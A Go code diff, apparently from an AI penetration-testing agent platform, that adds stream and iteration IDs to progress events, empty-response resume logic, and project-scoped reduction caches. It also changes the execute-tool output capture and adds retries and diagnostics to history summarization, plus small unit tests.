content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
}
if streamToolCallID != "" {
opts := []schema.ToolMessageOption{schema.WithToolName(toolName)}
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.ToolMessage(content, streamToolCallID, opts...))
}
tryEmitToolResultProgress(toolName, content, streamToolCallID, isErr, ev.AgentName)
if toolStreamRecvErr != nil && logger != nil {
logger.Warn("eino tool result stream recv error",
zap.Error(toolStreamRecvErr),
zap.String("agent", ev.AgentName),
zap.String("tool", toolName))
}
continue
}
if mv.IsStreaming && mv.MessageStream != nil { if mv.IsStreaming && mv.MessageStream != nil {
mainStreamID := fmt.Sprintf("eino-main-%s-%d", conversationID, atomic.AddInt64(&mainResponseStreamSeq, 1))
streamHeaderSent := false streamHeaderSent := false
var reasoningStreamID string var reasoningStreamID string
var toolStreamFragments []schema.ToolCall var toolStreamFragments []schema.ToolCall
@@ -738,6 +795,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": "orchestrator", "einoRole": "orchestrator",
"einoAgent": ev.AgentName, "einoAgent": ev.AgentName,
"orchestration": orchMode, "orchestration": orchMode,
"iteration": einoMainRound,
"streamId": mainStreamID,
}) })
streamHeaderSent = true streamHeaderSent = true
} }
@@ -747,6 +806,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": "orchestrator", "einoRole": "orchestrator",
"einoAgent": ev.AgentName, "einoAgent": ev.AgentName,
"orchestration": orchMode, "orchestration": orchMode,
"iteration": einoMainRound,
"streamId": mainStreamID,
}, mainAssistantBuf)) }, mainAssistantBuf))
mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, contentDelta) mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, contentDelta)
} }
@@ -779,6 +840,16 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
} }
if progress != nil && reasoningStreamID != "" && strings.TrimSpace(reasoningBuf) != "" {
progress("reasoning_chain_stream_end", openai.DisplayReasoningContent(strings.TrimSpace(reasoningBuf)), map[string]interface{}{
"streamId": reasoningStreamID,
"conversationId": conversationID,
"source": "eino",
"einoAgent": ev.AgentName,
"einoRole": einoRoleTag(ev.AgentName),
"orchestration": orchMode,
})
}
if streamsMainAssistant(ev.AgentName) { if streamsMainAssistant(ev.AgentName) {
s := strings.TrimSpace(mainAssistantBuf) s := strings.TrimSpace(mainAssistantBuf)
if mainAssistDupTarget != "" { if mainAssistDupTarget != "" {
@@ -806,6 +877,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": "orchestrator", "einoRole": "orchestrator",
"einoAgent": ev.AgentName, "einoAgent": ev.AgentName,
"orchestration": orchMode, "orchestration": orchMode,
"iteration": einoMainRound,
"streamId": mainStreamID,
}) })
} }
progress("response_delta", eofTail, openai.WithSSEAccumulated(map[string]interface{}{ progress("response_delta", eofTail, openai.WithSSEAccumulated(map[string]interface{}{
@@ -814,6 +887,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": "orchestrator", "einoRole": "orchestrator",
"einoAgent": ev.AgentName, "einoAgent": ev.AgentName,
"orchestration": orchMode, "orchestration": orchMode,
"iteration": einoMainRound,
"streamId": mainStreamID,
}, mainAssistantBuf)) }, mainAssistantBuf))
mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, eofTail) mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, eofTail)
} }
@@ -916,6 +991,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
executeStdoutDupMu.Unlock() executeStdoutDupMu.Unlock()
if progress != nil { if progress != nil {
nonStreamID := fmt.Sprintf("eino-main-%s-%d", conversationID, atomic.AddInt64(&mainResponseStreamSeq, 1))
progress("response_start", "", map[string]interface{}{ progress("response_start", "", map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
"mcpExecutionIds": snapshotMCPIDs(), "mcpExecutionIds": snapshotMCPIDs(),
@@ -923,6 +999,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": "orchestrator", "einoRole": "orchestrator",
"einoAgent": ev.AgentName, "einoAgent": ev.AgentName,
"orchestration": orchMode, "orchestration": orchMode,
"iteration": einoMainRound,
"streamId": nonStreamID,
}) })
progress("response_delta", body, openai.WithSSEAccumulated(map[string]interface{}{ progress("response_delta", body, openai.WithSSEAccumulated(map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
@@ -930,6 +1008,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": "orchestrator", "einoRole": "orchestrator",
"einoAgent": ev.AgentName, "einoAgent": ev.AgentName,
"orchestration": orchMode, "orchestration": orchMode,
"iteration": einoMainRound,
"streamId": nonStreamID,
}, body)) }, body))
} }
lastAssistant = body lastAssistant = body
@@ -948,7 +1028,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
if mv.Role == schema.Tool && progress != nil { if (mv.Role == schema.Tool || msg.Role == schema.Tool) && progress != nil {
toolName := msg.ToolName toolName := msg.ToolName
if toolName == "" { if toolName == "" {
toolName = mv.ToolName toolName = mv.ToolName
@@ -961,46 +1041,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix) content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
} }
preview := content
if len(preview) > 200 {
preview = preview[:200] + "..."
}
data := map[string]interface{}{
"toolName": toolName,
"success": !isErr,
"isError": isErr,
"result": content,
"resultPreview": preview,
"conversationId": conversationID,
"einoAgent": ev.AgentName,
"einoRole": einoRoleTag(ev.AgentName),
"source": "eino",
}
toolCallID := strings.TrimSpace(msg.ToolCallID) toolCallID := strings.TrimSpace(msg.ToolCallID)
if toolCallID == "" { tryEmitToolResultProgress(toolName, content, toolCallID, isErr, ev.AgentName)
if inferred, ok := popNextPendingForAgent(ev.AgentName); ok {
toolCallID = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(orchestratorName); ok {
toolCallID = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(""); ok {
toolCallID = inferred.ToolCallID
} else if inferred, ok := popAnyPending(); ok {
toolCallID = inferred.ToolCallID
}
}
if toolCallID != "" {
removePendingByID(toolCallID)
if _, loaded := toolResultSent.LoadOrStore(toolCallID, struct{}{}); loaded {
// ToolInvokeNotify 可能已推过 tool_result(如 execute 流式包装里 Fire 仅携带截断后的 stdout),
// 此处仍应用 ADK Tool 消息中的完整内容刷新去重基准,避免模型复述全文时与截断串比对失败而重复展示「助手输出」。
recordPendingExecuteStdoutDup(toolName, content, isErr)
continue
}
data["toolCallId"] = toolCallID
}
recordPendingExecuteStdoutDup(toolName, content, isErr)
recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
} }
} }
@@ -1012,9 +1054,32 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
orchMode, runAccumulatedMsgs, persistTraceSource(args, runAccumulatedMsgs), orchMode, runAccumulatedMsgs, persistTraceSource(args, runAccumulatedMsgs),
lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, false, lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, false,
) )
if shouldEinoEmptyResponseContinue(out, emptyHint, len(runAccumulatedMsgs), baseAccumulatedCount) {
if logger != nil {
logger.Info("eino empty response, ending run segment for handler resume",
zap.String("conversationId", conversationID),
zap.String("orchestration", orchMode),
zap.Int("traceMessages", len(runAccumulatedMsgs)))
}
if progress != nil {
progress("eino_empty_response_continue", "会话已结束但未产生助手正文,正在基于轨迹自动续跑…", map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"resumeKind": "trace_segment",
})
}
return out, ErrEmptyResponseContinue
}
return out, nil return out, nil
} }
func shouldEinoEmptyResponseContinue(out *RunResult, emptyHint string, accumulatedLen, baseCount int) bool {
if out == nil || accumulatedLen <= baseCount {
return false
}
return strings.TrimSpace(out.Response) == strings.TrimSpace(emptyHint)
}
func persistTraceSource(args *einoADKRunLoopArgs, fallback []adk.Message) []adk.Message { func persistTraceSource(args *einoADKRunLoopArgs, fallback []adk.Message) []adk.Message {
if args != nil && args.ModelFacingTrace != nil { if args != nil && args.ModelFacingTrace != nil {
if snap := args.ModelFacingTrace.Snapshot(); len(snap) > 0 { if snap := args.ModelFacingTrace.Snapshot(); len(snap) > 0 {
@@ -0,0 +1,21 @@
package multiagent
import "testing"
func TestShouldEinoEmptyResponseContinue(t *testing.T) {
t.Parallel()
hint := "(empty hint)"
out := &RunResult{Response: hint}
if !shouldEinoEmptyResponseContinue(out, hint, 3, 1) {
t.Fatal("expected continue when response is empty hint and trace grew")
}
if shouldEinoEmptyResponseContinue(out, hint, 1, 1) {
t.Fatal("expected no continue when trace did not grow")
}
if shouldEinoEmptyResponseContinue(&RunResult{Response: "hello"}, hint, 3, 1) {
t.Fatal("expected no continue when response has content")
}
if shouldEinoEmptyResponseContinue(nil, hint, 3, 1) {
t.Fatal("expected no continue for nil result")
}
}
+3 -3
View File
@@ -9,8 +9,8 @@ import (
// newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId) // newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId)
// 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。 // 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。
func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(command, stdout string, success bool, invokeErr error) { func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(toolCallID, command, stdout string, success bool, invokeErr error) {
return func(command, stdout string, success bool, invokeErr error) { return func(toolCallID, command, stdout string, success bool, invokeErr error) {
if ag == nil || recorder == nil { if ag == nil || recorder == nil {
return return
} }
@@ -25,7 +25,7 @@ func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRe
args := map[string]interface{}{"command": command} args := map[string]interface{}{"command": command}
id := ag.RecordLocalToolExecution("execute", args, stdout, err) id := ag.RecordLocalToolExecution("execute", args, stdout, err)
if id != "" { if id != "" {
recorder(id) recorder(id, toolCallID)
} }
} }
} }
@@ -53,7 +53,7 @@ type einoStreamingShellWrap struct {
// toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。 // toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。
toolTimeoutMinutes int toolTimeoutMinutes int
// recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。 // recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。
recordMonitor func(command, stdout string, success bool, invokeErr error) recordMonitor func(toolCallID, command, stdout string, success bool, invokeErr error)
} }
func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) { func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
@@ -84,7 +84,7 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
execCancel() execCancel()
} }
if w.recordMonitor != nil { if w.recordMonitor != nil {
w.recordMonitor(userCmd, "", false, err) w.recordMonitor(tid, userCmd, "", false, err)
} }
if w.invokeNotify != nil && tid != "" { if w.invokeNotify != nil && tid != "" {
w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err) w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err)
@@ -107,7 +107,6 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
} }
var sb strings.Builder var sb strings.Builder
const maxCapture = 16 * 1024
success := true success := true
var invokeErr error var invokeErr error
exitCode := 0 exitCode := 0
@@ -130,15 +129,10 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
exitCode = *resp.ExitCode exitCode = *resp.ExitCode
} }
var appended string var appended string
if remain := maxCapture - sb.Len(); remain > 0 { if resp.Output != "" {
out := resp.Output sb.WriteString(resp.Output)
if len(out) > remain { appended = resp.Output
out = out[:remain]
}
sb.WriteString(out)
appended = out
} }
// 仅推送写入 sb 的片段,与末尾 Fire/recordMonitor 的截断累计一致,避免最终 tool_result 短于已展示增量。
if w.outputChunk != nil && strings.TrimSpace(appended) != "" { if w.outputChunk != nil && strings.TrimSpace(appended) != "" {
w.outputChunk("execute", tid, appended) w.outputChunk("execute", tid, appended)
} }
@@ -167,16 +161,10 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
if w.outputChunk != nil && tid != "" { if w.outputChunk != nil && tid != "" {
w.outputChunk("execute", tid, hint) w.outputChunk("execute", tid, hint)
} }
if remain := maxCapture - sb.Len(); remain > 0 { sb.WriteString(hint)
h := hint
if len(h) > remain {
h = h[:remain]
}
sb.WriteString(h)
}
} }
if w.recordMonitor != nil { if w.recordMonitor != nil {
w.recordMonitor(command, sb.String(), success, invokeErr) w.recordMonitor(tid, command, sb.String(), success, invokeErr)
} }
w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr) w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr)
outW.Close() outW.Close()
@@ -96,6 +96,6 @@ func recordEinoADKFilesystemToolMonitor(
} }
id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr) id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr)
if id != "" { if id != "" {
rec(id) rec(id, toolCallID)
} }
} }
+23 -33
View File
@@ -43,22 +43,6 @@ func sanitizeEinoPathSegment(s string) string {
return s return s
} }
// localPlantaskBackend wraps the eino-ext local backend with plantask.Delete (Local has no Delete).
type localPlantaskBackend struct {
*localbk.Local
}
func (l *localPlantaskBackend) Delete(ctx context.Context, req *plantask.DeleteRequest) error {
if l == nil || l.Local == nil || req == nil {
return nil
}
p := strings.TrimSpace(req.FilePath)
if p == "" {
return nil
}
return os.Remove(p)
}
func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) { func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
if alwaysVisible <= 0 || len(all) <= alwaysVisible+1 { if alwaysVisible <= 0 || len(all) <= alwaysVisible+1 {
return all, nil, false return all, nil, false
@@ -67,14 +51,7 @@ func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []t
} }
func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbackAlwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) { func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbackAlwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
nameSet := make(map[string]struct{}, len(names)) nameSet := expandAlwaysVisibleNameSet(names)
for _, n := range names {
n = strings.TrimSpace(strings.ToLower(n))
if n == "" {
continue
}
nameSet[n] = struct{}{}
}
if len(nameSet) == 0 { if len(nameSet) == 0 {
return splitToolsForToolSearch(all, fallbackAlwaysVisible) return splitToolsForToolSearch(all, fallbackAlwaysVisible)
} }
@@ -87,9 +64,9 @@ func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbac
info, err := t.Info(context.Background()) info, err := t.Info(context.Background())
name := "" name := ""
if err == nil && info != nil { if err == nil && info != nil {
name = strings.TrimSpace(strings.ToLower(info.Name)) name = info.Name
} }
if _, keep := nameSet[name]; keep { if toolMatchesAlwaysVisible(name, nameSet) {
static = append(static, t) static = append(static, t)
continue continue
} }
@@ -126,14 +103,26 @@ func mergeAlwaysVisibleToolNames(configured []string) []string {
return merged return merged
} }
func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddlewareConfig, convID string, loc *localbk.Local, logger *zap.Logger) (adk.ChatModelAgentMiddleware, error) { func reductionCacheRootDir(configuredBase, projectID, conversationID string) string {
base := strings.TrimSpace(configuredBase)
if base == "" {
base = filepath.Join("tmp", "reduction")
}
if pid := strings.TrimSpace(projectID); pid != "" {
return filepath.Join(base, "projects", sanitizeEinoPathSegment(pid))
}
conv := strings.TrimSpace(conversationID)
if conv == "" {
conv = "default"
}
return filepath.Join(base, "conversations", sanitizeEinoPathSegment(conv))
}
func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddlewareConfig, projectID, convID string, loc *localbk.Local, logger *zap.Logger) (adk.ChatModelAgentMiddleware, error) {
if loc == nil { if loc == nil {
return nil, fmt.Errorf("reduction: local backend nil") return nil, fmt.Errorf("reduction: local backend nil")
} }
root := strings.TrimSpace(mw.ReductionRootDir) root := reductionCacheRootDir(mw.ReductionRootDir, projectID, convID)
if root == "" {
root = filepath.Join(os.TempDir(), "cyberstrike-reduction", sanitizeEinoPathSegment(convID))
}
if err := os.MkdirAll(root, 0o755); err != nil { if err := os.MkdirAll(root, 0o755); err != nil {
return nil, fmt.Errorf("reduction root: %w", err) return nil, fmt.Errorf("reduction root: %w", err)
} }
@@ -171,6 +160,7 @@ func prependEinoMiddlewares(
einoLoc *localbk.Local, einoLoc *localbk.Local,
skillsRoot string, skillsRoot string,
conversationID string, conversationID string,
projectID string,
logger *zap.Logger, logger *zap.Logger,
) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) { ) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) {
if mw == nil { if mw == nil {
@@ -190,7 +180,7 @@ func prependEinoMiddlewares(
if place == einoMWSub && !mw.ReductionSubAgents { if place == einoMWSub && !mw.ReductionSubAgents {
// skip // skip
} else { } else {
redMW, rerr := buildReductionMiddleware(ctx, *mw, conversationID, einoLoc, logger) redMW, rerr := buildReductionMiddleware(ctx, *mw, projectID, conversationID, einoLoc, logger)
if rerr != nil { if rerr != nil {
return nil, nil, false, rerr return nil, nil, false, rerr
} }
@@ -238,7 +228,7 @@ func prependEinoMiddlewares(
if mk := os.MkdirAll(baseDir, 0o755); mk != nil { if mk := os.MkdirAll(baseDir, 0o755); mk != nil {
return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk) return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk)
} }
ptBE := &localPlantaskBackend{Local: einoLoc} ptBE := newLocalPlantaskBackend(einoLoc)
pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir}) pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir})
if perr != nil { if perr != nil {
return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr) return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr)
@@ -3,12 +3,31 @@ package multiagent
import ( import (
"context" "context"
"fmt" "fmt"
"path/filepath"
"strings"
"testing" "testing"
"github.com/cloudwego/eino/components/tool" "github.com/cloudwego/eino/components/tool"
"github.com/cloudwego/eino/schema" "github.com/cloudwego/eino/schema"
) )
func TestReductionCacheRootDir(t *testing.T) {
got := reductionCacheRootDir("", "proj-1", "conv-1")
want := filepath.Join("tmp", "reduction", "projects", "proj-1")
if got != want {
t.Fatalf("project scope: got %q want %q", got, want)
}
got = reductionCacheRootDir("", "", "conv-abc")
want = filepath.Join("tmp", "reduction", "conversations", "conv-abc")
if got != want {
t.Fatalf("conversation scope: got %q want %q", got, want)
}
custom := reductionCacheRootDir("/data/cache", "p1", "c1")
if !strings.HasSuffix(custom, filepath.Join("projects", "p1")) {
t.Fatalf("custom base should still scope by project, got %q", custom)
}
}
type stubTool struct{ name string } type stubTool struct{ name string }
func (s stubTool) Info(_ context.Context) (*schema.ToolInfo, error) { func (s stubTool) Info(_ context.Context) (*schema.ToolInfo, error) {
+9 -18
View File
@@ -34,6 +34,7 @@ func RunEinoSingleChatModelAgent(
ag *agent.Agent, ag *agent.Agent,
logger *zap.Logger, logger *zap.Logger,
conversationID string, conversationID string,
projectID string,
userMessage string, userMessage string,
history []agent.ChatMessage, history []agent.ChatMessage,
roleTools []string, roleTools []string,
@@ -58,10 +59,12 @@ func RunEinoSingleChatModelAgent(
var mcpIDsMu sync.Mutex var mcpIDsMu sync.Mutex
var mcpIDs []string var mcpIDs []string
recorder := func(id string) { mcpExecBinder := NewMCPExecutionBinder()
recorder := func(id, toolCallID string) {
if id == "" { if id == "" {
return return
} }
mcpExecBinder.Bind(toolCallID, id)
mcpIDsMu.Lock() mcpIDsMu.Lock()
mcpIDs = append(mcpIDs, id) mcpIDs = append(mcpIDs, id)
mcpIDsMu.Unlock() mcpIDsMu.Unlock()
@@ -75,29 +78,15 @@ func RunEinoSingleChatModelAgent(
return out return out
} }
toolOutputChunk := func(toolName, toolCallID, chunk string) {
if progress == nil || toolCallID == "" {
return
}
progress("tool_result_delta", chunk, map[string]interface{}{
"toolName": toolName,
"toolCallId": toolCallID,
"index": 0,
"total": 0,
"iteration": 0,
"source": "eino",
})
}
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder() toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder) einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder)
mainDefs := ag.ToolsForRole(roleTools) mainDefs := ag.ToolsForRole(roleTools)
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, einoSingleAgentName) mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, nil, toolInvokeNotify, einoSingleAgentName)
if err != nil { if err != nil {
return nil, err return nil, err
} }
mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger) mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("eino single eino 中间件: %w", err) return nil, fmt.Errorf("eino single eino 中间件: %w", err)
} }
@@ -117,6 +106,7 @@ func RunEinoSingleChatModelAgent(
}, },
} }
httpClient = openai.NewEinoHTTPClient(&appCfg.OpenAI, httpClient) httpClient = openai.NewEinoHTTPClient(&appCfg.OpenAI, httpClient)
openai.AttachSummarizationDiagTransport(httpClient, logger)
baseModelCfg := &einoopenai.ChatModelConfig{ baseModelCfg := &einoopenai.ChatModelConfig{
APIKey: appCfg.OpenAI.APIKey, APIKey: appCfg.OpenAI.APIKey,
@@ -144,7 +134,7 @@ func RunEinoSingleChatModelAgent(
} }
if einoSkillMW != nil { if einoSkillMW != nil {
if einoFSTools && einoLoc != nil { if einoFSTools && einoLoc != nil {
fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk) fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
if fsErr != nil { if fsErr != nil {
return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr) return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr)
} }
@@ -236,6 +226,7 @@ func RunEinoSingleChatModelAgent(
McpIDs: &mcpIDs, McpIDs: &mcpIDs,
FilesystemMonitorAgent: ag, FilesystemMonitorAgent: ag,
FilesystemMonitorRecord: recorder, FilesystemMonitorRecord: recorder,
MCPExecutionBinder: mcpExecBinder,
ToolInvokeNotify: toolInvokeNotify, ToolInvokeNotify: toolInvokeNotify,
DA: chatAgent, DA: chatAgent,
ModelFacingTrace: modelFacingTrace, ModelFacingTrace: modelFacingTrace,
+1 -1
View File
@@ -81,7 +81,7 @@ func subAgentFilesystemMiddleware(
loc *localbk.Local, loc *localbk.Local,
invokeNotify *einomcp.ToolInvokeNotifyHolder, invokeNotify *einomcp.ToolInvokeNotifyHolder,
einoAgentName string, einoAgentName string,
recordMonitor func(command, stdout string, success bool, invokeErr error), recordMonitor func(toolCallID, command, stdout string, success bool, invokeErr error),
toolTimeoutMinutes int, toolTimeoutMinutes int,
outputChunk func(toolName, toolCallID, chunk string), outputChunk func(toolName, toolCallID, chunk string),
) (adk.ChatModelAgentMiddleware, error) { ) (adk.ChatModelAgentMiddleware, error) {
+78 -14
View File
@@ -9,15 +9,19 @@ import (
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
copenai "cyberstrike-ai/internal/openai"
"github.com/bytedance/sonic" "github.com/bytedance/sonic"
"github.com/cloudwego/eino/adk" "github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/adk/middlewares/summarization" "github.com/cloudwego/eino/adk/middlewares/summarization"
"github.com/cloudwego/eino/components/model" "github.com/cloudwego/eino/components/model"
"github.com/cloudwego/eino/schema" "github.com/cloudwego/eino/schema"
einoopenai "github.com/cloudwego/eino-ext/components/model/openai"
"go.uber.org/zap" "go.uber.org/zap"
) )
const defaultSummarizationRetryMax = 3
// einoSummarizeUserInstruction:压缩历史时保留渗透测试关键信息。 // einoSummarizeUserInstruction:压缩历史时保留渗透测试关键信息。
const einoSummarizeUserInstruction = `在保持所有关键安全测试信息完整的前提下压缩对话历史 const einoSummarizeUserInstruction = `在保持所有关键安全测试信息完整的前提下压缩对话历史
@@ -89,8 +93,32 @@ func newEinoSummarizationMiddleware(
} }
} }
retryMax := defaultSummarizationRetryMax
if mwCfg != nil && mwCfg.SummarizationRetryMaxAttempts > 0 {
retryMax = mwCfg.SummarizationRetryMaxAttempts
}
// ModelOptions apply only to summarization Generate (same ChatModel instance as the agent).
// Strip thinking/reasoning on this call path; mark requests for empty-choices diagnostics.
summaryModelOpts := []model.Option{
einoopenai.WithExtraHeader(map[string]string{
copenai.SummarizationRequestHeader: "1",
}),
einoopenai.WithRequestPayloadModifier(func(_ context.Context, in []*schema.Message, rawBody []byte) ([]byte, error) {
if logger != nil {
logger.Info("eino summarization generate request",
zap.Int("input_messages", len(in)),
zap.Int("payload_bytes", len(rawBody)),
zap.String("model", modelName),
)
}
return stripReasoningFromSummarizationPayload(rawBody)
}),
}
mw, err := summarization.New(ctx, &summarization.Config{ mw, err := summarization.New(ctx, &summarization.Config{
Model: summaryModel, Model: summaryModel,
ModelOptions: summaryModelOpts,
Trigger: &summarization.TriggerCondition{ Trigger: &summarization.TriggerCondition{
ContextTokens: trigger, ContextTokens: trigger,
}, },
@@ -102,24 +130,43 @@ func newEinoSummarizationMiddleware(
Enabled: true, Enabled: true,
MaxTokens: preserveMax, MaxTokens: preserveMax,
}, },
Retry: &summarization.RetryConfig{
MaxRetries: &retryMax,
ShouldRetry: func(_ context.Context, _ adk.Message, err error) bool {
if err != nil && logger != nil {
logger.Warn("eino summarization generate attempt failed, will retry if attempts remain",
zap.Error(err),
zap.Int("max_retries", retryMax),
)
}
return err != nil
},
},
Finalize: func(ctx context.Context, originalMessages []adk.Message, summary adk.Message) ([]adk.Message, error) { Finalize: func(ctx context.Context, originalMessages []adk.Message, summary adk.Message) ([]adk.Message, error) {
return summarizeFinalizeWithRecentAssistantToolTrail(ctx, originalMessages, summary, tokenCounter, recentTrailMax) return summarizeFinalizeWithRecentAssistantToolTrail(ctx, originalMessages, summary, tokenCounter, recentTrailMax)
}, },
Callback: func(ctx context.Context, before, after adk.ChatModelAgentState) error { Callback: func(ctx context.Context, before, after adk.ChatModelAgentState) error {
if logger == nil { if transcriptPath != "" && len(before.Messages) > 0 {
return nil if werr := writeSummarizationTranscript(transcriptPath, before.Messages); werr != nil && logger != nil {
logger.Warn("eino summarization transcript 写入失败",
zap.String("path", transcriptPath),
zap.Error(werr),
)
}
}
if logger != nil {
beforeTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: before.Messages})
afterTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: after.Messages})
logger.Info("eino summarization 已压缩上下文",
zap.Int("messages_before", len(before.Messages)),
zap.Int("messages_after", len(after.Messages)),
zap.Int("tokens_before_estimated", beforeTokens),
zap.Int("tokens_after_estimated", afterTokens),
zap.Int("max_total_tokens", maxTotal),
zap.Int("trigger_context_tokens", trigger),
zap.String("transcript_file", transcriptPath),
)
} }
beforeTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: before.Messages})
afterTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: after.Messages})
logger.Info("eino summarization 已压缩上下文",
zap.Int("messages_before", len(before.Messages)),
zap.Int("messages_after", len(after.Messages)),
